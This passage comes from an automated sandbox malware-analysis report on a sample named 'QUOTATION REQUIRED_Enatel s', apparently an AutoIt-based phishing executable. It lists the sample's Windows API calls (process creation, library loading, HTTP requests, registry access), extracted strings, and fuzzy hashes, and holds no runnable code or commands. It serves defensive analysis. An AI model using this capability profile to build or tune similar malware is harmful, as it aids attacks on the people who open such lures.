                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                    • API String ID: 1103490817-4258414348
                                                                                                                    • Opcode ID: b7fcbe73d67f7ba2efa6d5163b281c68492b0b5e1e6679bd3826296b786a31f3
                                                                                                                    • Instruction ID: 5e4767262cb8fdbb8a917510ba2d9a122a73ea0b90d7304b51345084f26ece9d
                                                                                                                    • Opcode Fuzzy Hash: b7fcbe73d67f7ba2efa6d5163b281c68492b0b5e1e6679bd3826296b786a31f3
                                                                                                                    • Instruction Fuzzy Hash: 16E1CF726083018FC714EF24D85092AB7E2FF89364F14895DF8999B362DB34ED45EB91
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                    • API String ID: 1256254125-909552448
                                                                                                                    • Opcode ID: 4d54c8062f344cf04500ae3bc2cdc9035af6aed71f1f5b9bccadbed98fba196b
                                                                                                                    • Instruction ID: e114cf4f65b76a34d08b1bc02742c206313882a9cf7a0280e228949fbf7ce260
                                                                                                                    • Opcode Fuzzy Hash: 4d54c8062f344cf04500ae3bc2cdc9035af6aed71f1f5b9bccadbed98fba196b
                                                                                                                    • Instruction Fuzzy Hash: 94711533A0016A8BEF20DE78CD516BE3391ABA0774F550529F8569B285F639DD84F3E0
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00FA835A
                                                                                                                    • _wcslen.LIBCMT ref: 00FA836E
                                                                                                                    • _wcslen.LIBCMT ref: 00FA8391
                                                                                                                    • _wcslen.LIBCMT ref: 00FA83B4
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00FA83F2
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00FA5BF2), ref: 00FA844E
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FA8487
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00FA84CA
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FA8501
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00FA850D
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FA851D
                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00FA5BF2), ref: 00FA852C
                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00FA8549
                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00FA8555
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                    • API String ID: 799131459-1154884017
                                                                                                                    • Opcode ID: 9a6f10093a558555770097cffde1cab3901ceeeeaee0072c5a5c499c901ca0b1
                                                                                                                    • Instruction ID: b745070c912a30851dbd648a74f2fdfbc74dbd510c181a5b04d98f384f974628
                                                                                                                    • Opcode Fuzzy Hash: 9a6f10093a558555770097cffde1cab3901ceeeeaee0072c5a5c499c901ca0b1
                                                                                                                    • Instruction Fuzzy Hash: B161F1B1900209BEEB14DF64CC45BFE77A8BF09761F104509FC15DA1D1EBB8A981E7A0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                    • API String ID: 0-1645009161
                                                                                                                    • Opcode ID: 7937823ed921d7d6c032d352f3a0ee8ace3680c43d5ceac9a29ddf616b73790d
                                                                                                                    • Instruction ID: ab3811961e8e8a5f7883239067c8125b976f2655437c910b1da2335694e310b8
                                                                                                                    • Opcode Fuzzy Hash: 7937823ed921d7d6c032d352f3a0ee8ace3680c43d5ceac9a29ddf616b73790d
                                                                                                                    • Instruction Fuzzy Hash: EF8106B1A04705ABDB20BF60DC52FEE3B74AF05760F044024FD09AA192EB78D985F7A1
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00F83EF8
                                                                                                                    • _wcslen.LIBCMT ref: 00F83F03
                                                                                                                    • _wcslen.LIBCMT ref: 00F83F5A
                                                                                                                    • _wcslen.LIBCMT ref: 00F83F98
                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 00F83FD6
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F8401E
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F84059
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F84087
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                    • API String ID: 1839972693-4113822522
                                                                                                                    • Opcode ID: ce0a4e912315df09b63bc2f79ee8ca1304dd181b8dfa6b095179db4b7ca0d272
                                                                                                                    • Instruction ID: fbbaa7cf43d93e5dd24ae2a107bee431b083848c36dc297c35ea550319b18e23
                                                                                                                    • Opcode Fuzzy Hash: ce0a4e912315df09b63bc2f79ee8ca1304dd181b8dfa6b095179db4b7ca0d272
                                                                                                                    • Instruction Fuzzy Hash: 9B71E132A042029FC310EF24C8809ABB7F5EF94764F04492DF996D7261EB35ED85EB91
                                                                                                                    APIs
                                                                                                                    • LoadIconW.USER32(00000063), ref: 00F75A2E
                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F75A40
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00F75A57
                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00F75A6C
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00F75A72
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00F75A82
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00F75A88
                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F75AA9
                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F75AC3
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F75ACC
                                                                                                                    • _wcslen.LIBCMT ref: 00F75B33
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00F75B6F
                                                                                                                    • GetDesktopWindow.USER32 ref: 00F75B75
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00F75B7C
                                                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00F75BD3
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00F75BE0
                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00F75C05
                                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F75C2F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 895679908-0
                                                                                                                    • Opcode ID: 7fd0236e8e4447f286c417188eb608e6e7679a11581d1bdc0106f86803d8bfaf
                                                                                                                    • Instruction ID: 78d2ebcaeb22eb1eaa5cd5d210825e0668f7e9d35d28489e54bdf807b89754bf
                                                                                                                    • Opcode Fuzzy Hash: 7fd0236e8e4447f286c417188eb608e6e7679a11581d1bdc0106f86803d8bfaf
                                                                                                                    • Instruction Fuzzy Hash: CA717F71900B099FDB20DFA8CE85F6EBBF5FF48B14F104919E14AA26A0D7B4E944DB50
APIs
• __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00F300C6
  • Part of subcall function 00F300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00FE070C,00000FA0,4E90B266,?,?,?,?,00F523B3,000000FF), ref: 00F3011C
  • Part of subcall function 00F300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00F523B3,000000FF), ref: 00F30127
  • Part of subcall function 00F300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00F523B3,000000FF), ref: 00F30138
  • Part of subcall function 00F300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F3014E
  • Part of subcall function 00F300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F3015C
  • Part of subcall function 00F300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F3016A
  • Part of subcall function 00F300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F30195
  • Part of subcall function 00F300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F301A0
• ___scrt_fastfail.LIBCMT ref: 00F300E7
  • Part of subcall function 00F300A3: __onexit.LIBCMT ref: 00F300A9
Strings
• InitializeConditionVariable, xrefs: 00F30148
• kernel32.dll, xrefs: 00F30133
• SleepConditionVariableCS, xrefs: 00F30154
• WakeAllConditionVariable, xrefs: 00F30162
• api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F30122
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
• String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
• API String ID: 66158676-1714406822
• Opcode ID: ae90f1dbe776af6883f1f108ab9a3d7df12ea1c0f20e30d5e773e7f8ba3d4ba6
• Instruction ID: 52d297bbcfc3a45edbc9409646a9248e23c14a734bbb128772a2b026c6a016a9
• Opcode Fuzzy Hash: ae90f1dbe776af6883f1f108ab9a3d7df12ea1c0f20e30d5e773e7f8ba3d4ba6
• Instruction Fuzzy Hash: 3E21F6B2E447156BE7216BA4AC55B2A73A4EB46B71F00013BF801E7291DFB4DC00BAD1
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: _wcslen
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 176396367-1603158881
• Opcode ID: b21d95e34a31bcc4ac6d6ee5dcad85b1c4ccc182cf416518255d1fdc9a56b0b3
• Instruction ID: 805c08a03f3614ec3999555234189a68951168868ab0fef1cfa4a768a1df9a57
• Opcode Fuzzy Hash: b21d95e34a31bcc4ac6d6ee5dcad85b1c4ccc182cf416518255d1fdc9a56b0b3
• Instruction Fuzzy Hash: F7E1B332E00516BACB18DF74C8517EEBBB1BF54720F58C12BE45AA7241DB30AE85B791
APIs
• CharLowerBuffW.USER32(00000000,00000000,00FACC08), ref: 00F84527
• _wcslen.LIBCMT ref: 00F8453B
• _wcslen.LIBCMT ref: 00F84599
• _wcslen.LIBCMT ref: 00F845F4
• _wcslen.LIBCMT ref: 00F8463F
• _wcslen.LIBCMT ref: 00F846A7
  • Part of subcall function 00F2F9F2: _wcslen.LIBCMT ref: 00F2F9FD
• GetDriveTypeW.KERNEL32(?,00FD6BF0,00000061), ref: 00F84743
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: _wcslen$BuffCharDriveLowerType
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2055661098-1000479233
• Opcode ID: ed30b2552c43f19f32459d973aacd4a13efb9c9115208520646836237e915a58
• Instruction ID: 404036e4343d82e98cf17e28d52183cef4561ba7425fa03278aa2460e64913c9
• Opcode Fuzzy Hash: ed30b2552c43f19f32459d973aacd4a13efb9c9115208520646836237e915a58
• Instruction Fuzzy Hash: D4B1C371A083029FC710EF28C890AAEF7E5AFA5770F54491DF496C7291E734E944EB92
APIs
• _wcslen.LIBCMT ref: 00F9B198
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F9B1B0
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F9B1D4
• _wcslen.LIBCMT ref: 00F9B200
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F9B214
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F9B236
• _wcslen.LIBCMT ref: 00F9B332
  • Part of subcall function 00F805A7: GetStdHandle.KERNEL32(000000F6), ref: 00F805C6
• _wcslen.LIBCMT ref: 00F9B34B
• _wcslen.LIBCMT ref: 00F9B366
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F9B3B6
• GetLastError.KERNEL32(00000000), ref: 00F9B407
• CloseHandle.KERNEL32(?), ref: 00F9B439
• CloseHandle.KERNEL32(00000000), ref: 00F9B44A
• CloseHandle.KERNEL32(00000000), ref: 00F9B45C
• CloseHandle.KERNEL32(00000000), ref: 00F9B46E
• CloseHandle.KERNEL32(?), ref: 00F9B4E3
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
• String ID:
• API String ID: 2178637699-0
• Opcode ID: 772ad936abd09928cb77eb0f4d4a88fb0fd2c95b43809cc4d28d628651b305a4
• Instruction ID: 7b9c1318610bbe6d2a85cbebd2839c188a008bde75c972f9ebb69c1645e8a32f
• Opcode Fuzzy Hash: 772ad936abd09928cb77eb0f4d4a88fb0fd2c95b43809cc4d28d628651b305a4
• Instruction Fuzzy Hash: EDF1B131A04300DFDB15EF24D991B6EBBE1AF85320F18855DF4998B2A2DB35EC44EB52
APIs
• GetMenuItemCount.USER32(00FE1990), ref: 00F52F8D
• GetMenuItemCount.USER32(00FE1990), ref: 00F5303D
• GetCursorPos.USER32(?), ref: 00F53081
• SetForegroundWindow.USER32(00000000), ref: 00F5308A
• TrackPopupMenuEx.USER32(00FE1990,00000000,?,00000000,00000000,00000000), ref: 00F5309D
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F530A9
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 36266755-4108050209
• Opcode ID: 4e16844a7c178e18ad67374c82a73d79cd16bbc6bb94fbb213d6abdb41532b79
• Instruction ID: 81eeddc469333f45d36843a05757f8f2fe0c603af70c3f80c141d5ccb96b254d
• Opcode Fuzzy Hash: 4e16844a7c178e18ad67374c82a73d79cd16bbc6bb94fbb213d6abdb41532b79
• Instruction Fuzzy Hash: 8C713A71A44245BFEB219F24DC49F9ABFA4FF02374F204206FA156A1E0C7B1A954F791
APIs
• DestroyWindow.USER32(?,?), ref: 00FA6DEB
  • Part of subcall function 00F16B57: _wcslen.LIBCMT ref: 00F16B6A
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00FA6E5F
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00FA6E81
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FA6E94
• DestroyWindow.USER32(?), ref: 00FA6EB5
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00F10000,00000000), ref: 00FA6EE4
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00FA6EFD
• GetDesktopWindow.USER32 ref: 00FA6F16
• GetWindowRect.USER32(00000000), ref: 00FA6F1D
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00FA6F35
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00FA6F4D
  • Part of subcall function 00F29944: GetWindowLongW.USER32(?,000000EB), ref: 00F29952
Strings
Memory Dump Source
• Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
• Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
• String ID: 0$tooltips_class32
• API String ID: 2429346358-3619404913
• Opcode ID: 385985307de1dcf7814dd6551aa6130b74d4f894b79ac90a73e7fd2f8c8565fb
• Instruction ID: 6f7d4fb1a0114a399359fa86b3ce862b3c98c5ad4f011fd587bf94efaeb56c3b
• Opcode Fuzzy Hash: 385985307de1dcf7814dd6551aa6130b74d4f894b79ac90a73e7fd2f8c8565fb
• Instruction Fuzzy Hash: D47179B4544244AFDB21CF18DC84FAABBE9FB8A314F08041EF999C72A1D770E905EB55
APIs
  • Part of subcall function 00F29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00F29BB2
• DragQueryPoint.SHELL32(?,?), ref: 00FA9147
  • Part of subcall function 00FA7674: ClientToScreen.USER32(?,?), ref: 00FA769A
  • Part of subcall function 00FA7674: GetWindowRect.USER32(?,?), ref: 00FA7710
  • Part of subcall function 00FA7674: PtInRect.USER32(?,?,00FA8B89), ref: 00FA7720
• SendMessageW.USER32(?,000000B0,?,?), ref: 00FA91B0
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00FA91BB
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00FA91DE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 00FA9225
• SendMessageW.USER32(?,000000B0,?,?), ref: 00FA923E
• SendMessageW.USER32(?,000000B1,?,?), ref: 00FA9255
• SendMessageW.USER32(?,000000B1,?,?), ref: 00FA9277
• DragFinish.SHELL32(?), ref: 00FA927E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00FA9371
Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                     • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                    • API String ID: 221274066-3440237614
                                                                                                                    • Opcode ID: e329dae97d0e16fe4afb1b220a01da4d587bcf2b6b089b1185e4fc1c8c0c4835
                                                                                                                    • Instruction ID: 1a70944e28b011f1fca421284fadfb50a4d10318ecaf0dca1fa82740ffb4d68c
                                                                                                                    • Opcode Fuzzy Hash: e329dae97d0e16fe4afb1b220a01da4d587bcf2b6b089b1185e4fc1c8c0c4835
                                                                                                                    • Instruction Fuzzy Hash: E7618CB1108305AFD701DF61DC85DAFBBE8EF89350F40092EF595932A1DB709A49EB92
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F8C4B0
                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00F8C4C3
                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00F8C4D7
                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F8C4F0
                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00F8C533
                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F8C549
